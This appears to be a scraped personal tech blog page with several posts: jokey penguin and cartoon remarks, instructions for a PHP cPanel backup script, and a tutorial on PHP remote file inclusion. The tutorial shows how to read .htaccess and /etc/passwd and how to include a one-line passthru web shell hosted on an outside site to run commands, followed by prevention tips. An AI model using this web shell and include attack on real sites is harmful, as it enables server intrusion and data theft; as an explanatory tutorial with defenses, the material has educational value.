Stewie Griffin is the only thing sexier than the Linux Penguin. I’m almost too scared to post this gallery because I don’t want to be arrested for child porn.

This is a simple script derived from the cPanel process that generates full account backups, only in PHP form. This makes the task of backing up your site easier and more reliable by allowing you to generate and maintain your own full site backups.

Download v1.6

• Automatic backup via Cron job
• Generates an actual cPanel backup in tar.gz format
• Very easy to set up, and executable with only one simple command
• Email notification when the backup is complete
• FTP option to transfer the backup file to a specified FTP server
• Compatible with monsoon, x, x2, and x3 themes

Requirements:

• cPanel 10 or higher with Cron job and backup functionality enabled
• PHP 4.1.x or higher
• FTP access (optional)

How to Use:

1. Download the script to your computer and extract the tarball
2. Edit the cpanel_backup.php file with your cPanel settings:

$cpuser = Your cPanel username

$cppass = Your cPanel password

$domain = The domain name where cPanel is run, usually without the www’s

$skin = cPanel skin that you are currently running. This will usually be “x3″ if you’re on cPanel 11 and “x” if you’re still on 10 (which I hope you’re not) but your webhost may have changed this. You can double-check by logging into cPanel and viewing your server settings:

The next section will set up the FTP options to upload the backup tarball to a server. If the FTP location is the same as the server you are doing the backup on, you should leave these fields blank.

$ftpuser = Username for your FTP site

$ftppass = Password for your FTP site

$ftphost = FTP hostname (usually ftp.yourdomainname.com)

$ftpmode = The mode in which you would like to have the file transferred. I would recommend “passive” mode, especially for larger sites.

$notifyemail = The email address that the backup confirmation should be send to once the backup is complete

$secure = Whether or not to allow the script to access your cPanel through its secure ports

$debug = Whether or not to show the detailed backup results in your confirmation email

4. Once the php file has been configured, upload it to your webserver. For security’s sake, it is very important that you make sure this file is located outside your document root (public_html) with permissions of 600

5. Now, all you need to do is set the crontab. Log into your cPanel and go to the “Cron Jobs” section and choose “Standard.” Here is where you will create the actual cron job to run the script whenever you want:

The command may vary depending on the setup of PHP on your server, but your Cron command will be as follows:

php -q /home/username/cpanel_backup.php

Known issues:

• Users having the rvskin theme have indicated that using ‘x3′ at the theme may work, but others have said that the the script just doesn’t work at all.  I’d say just try running a backup manually and see what theme is in your URL when you do it, and use that.

Upcoming Features:

• Support for SSH/scp
• Selection of remote directory for FTP and SSH/scp
• Option to just back up MySQL databases or home directory

Ya know, I’ve never noticed how friggin sexy the Linux penguin is. I mean those flippers and that long, heard beak?… so hot.

Here are some more picture of the Linux Penguin being sexy:

Sexy Linux Penguin Gallery

This is a basic tutorial on how to do a simple PHP injection, for all you n00bish script kiddies

UPDATE:  FYI, since the release of php 5.2.1, this post mainly applies to earlier versions since remote includes will be disabled in all future releases unless specifically allowed in php.ini.

So basically, a PHP injection is a way of slipping your code in with someone else’s, while making the server think it is legit. Take a common php-formatted URL:

http://v-nessa.net/index.php?page=mypage.php

You need to understand what this URL is doing — basically, it is calling on the index.php page, but the ? lets the server know that there is a command string following, in this case a page specification of mypage.php. ? Acts as an include by pulling the contents of a specified file into index.php. There’s what my index.php file looks like:

<?php include ('header.php');

include($page) //this is the page we are calling in the URL ?>

Now, the index.php?page= syntax is the worse case scenario — it will allow you to include the contents of any page into index.php. Do you get where I’m going with this?

An easy example and test is to take your vulnerable page and append an extra URL to it, for example, google.com. So my URL will look like this:

http://v-nessa.net/index.php?page=http://google.com

If you see Google show up anywhere on the page, then congratulations, you found a leak in the code. Now, knowing that you can pull any file into the URL and have it posted in index.php, I’m sure your mind is wandering with possibilies. Why don’t we try the .htaccess?

http://v-nessa.net/index.php?page=.htaccess

Or if you’re feeling daring you could probably even grab the master passwd file on the server:

http://v-nessa.net/index.php?page=/etc/passwd

But don’t get your hopes on on that one… most servers use open base_dir protection with Apache to keep php from going where it shouldn’t go.

Now thank we know the basics, let’s have some fun!

Using something like Notepad, create a text file and save it as a cmd.jpg in ANSI coding, and upload it to your server:

<?php passthru($cmd); ?>

Now go back to the vulnerable page, but add your file’s URL to the end:

http://v-nessa.net/index.php?page=http://hackersite.com/cmd.jpg

Now you can append commands the end of the URL to run Linux commands in the browser. Yes, Linux commands — meaning you now have free reign to the user’s directories, especially ones that are stupidly set to 666 or 777. You can pretty much do anything, like create files/folders, write scripts, download more files, and maybe even delete a few. Here’s the syntax:

http://v-nessa.net/index.php?page=http://hackersite.com/cmd.jpg?cmd=mkdir weeeeeeee

*sigh* Now I have to tell you how to prevent this. In a nutshell:

1. Install mod_security into Apache and make sure your rulesets accomodate the php software you have installed, including access to sensitive files like .htaccess and .htpasswd. This means when those files are called in a browser the server will deny the request.

2. Turn register_globals of for php. It shouldn’t be on anyways.

3. You’ll probably want to add a file exists() function, which will make sure that any included files exist locally.

4. Turn off url Fopen in php.ini or .htaccess, but beware, because some software requires this to work.

UPDATE: Since php 5.2.1, remote includes are no longer enabled without the php.ini directive for allow_url_include. Read Post

5. Make sure you have open base_dir protection enabled in Apache so PHP can’t access files outside the user directory.

6. And the big DUH! Keep your software up to date and refrain from making any folders or files on your site writeable by the “everyone else” group without taking the proper measures to protect them.

Just when we all though the world couldn’t get any worse, it seems that Google, O-Reilly, and Wired Magazine got together to name David Hansson (the creator of Rails) the Hottest Hacker on Earth. It’s like they just decided to come up with a new award that no one’s ever heard of. What now? Is this kid going to get a scholarship to Harvard? Is he going to land a gig with a top technology firm? Hardly not. You’ll most likely find him sitting on his couch wearing a wifebeater and chucking mustard at the TV. He is kind of cute though, but I could never marry a guy who’s middle name sounds like a penis metaphor.